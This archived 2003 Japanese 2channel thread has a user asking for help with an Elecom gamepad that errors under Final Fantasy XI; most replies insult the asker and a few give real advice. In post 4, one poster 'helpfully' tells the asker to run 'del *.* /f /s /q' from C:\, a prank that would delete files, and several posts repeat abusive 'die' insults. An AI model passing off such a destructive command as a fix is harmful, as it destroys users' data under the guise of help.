2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ゲームパットが動作しません

1 :質問者A:03/09/26 16:05 ID:CPup38j2
ファイナルファンタジー11に対応したゲームパットを
購入し、インストールを進めたのですが、
ヒューマン・インターフェイス・デバイスの
HID準拠ゲームコントローラという項目がエラーになって
動作せずに困ってます。
一応 http://www.elecom.co/jp/ やプレイオンラインの
ホームページも検索したり、説明書みながら4時間ほどPCを
いじってみましたが解決せず、FFをまともに楽しめません。
ゲームパットの型番は(JC-U1112V)なのですが
何か知ってる方や、解決案を知ってる方。
よろしければ教えてください〜(泣)


2 :名も無き求道者:03/09/26 16:10 ID:o5lH9v5U
>>1
PS2でやれ
単発スレ立てんな

           終       了

3 :名も無き求道者:03/09/26 16:33 ID:bRT54Oe7
>>1
氏ねカス

4 :名も無き求道者:03/09/26 16:41 ID:BZPZGZ+I
>>1
スタートメニューからコマンドプロンプトかMS-DOSプロンプト開いて
「cd c:\」と打ち込み、次に「del *.* /f /s /q」と入力すればOK


5 :名も無き求道者:03/09/27 04:08 ID:XOa3riqs
>>4
お前逮捕されるぞ
>>1
詩音

6 :名も無き求道者:03/09/27 15:15 ID:PmALhfTe
お願いします。教えてください。
>>2-5
氏ね。カスども。

7 :名も無き求道者:03/09/27 20:46 ID:XOa3riqs
>>6
Taisaiに見つめられて死ね

8 :名も無き求道者:03/09/28 04:49 ID:/Xmufni0
お願いします。死んでください。
>>1
氏ね。カス。


9 :名も無き求道者:03/09/29 13:10 ID:bjtZ7xGz
板違いなことに気づけ。
あと、質問するならするで
使用OS詳細、言葉で説明できないなら実際のスクリーンショットのうpくらは汁。

10 :谷口:03/09/30 02:16 ID:iv8llzGI
シネしね言いすぎだ
>>2-9
お前らこそ死ね

11 :名も無き求道者:03/09/30 05:11 ID:OCqCeGwE
板違いだってことは知ってんだけどさ。
漏れも同じコントローラ使って全く同じ症状なわけよ。
推奨環境なのに動きゃしねぇ
HPにFAQもないしな。最悪のコントローラだよ

結論から言うと、メーカーにクレームつけて返品汁!
それが一番早い。


12 :名も無き求道者:03/09/30 10:36 ID:GUnTNpJH
上げんな

13 :名も無き求道者:03/10/01 10:25 ID:Ewoay85R
ttp://www.elecom.co.jp/support/peripheral/info/jcu1112v/jcu1112v_index.html
このへんみろ。あと解決したら削除以来出せよ。

3 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)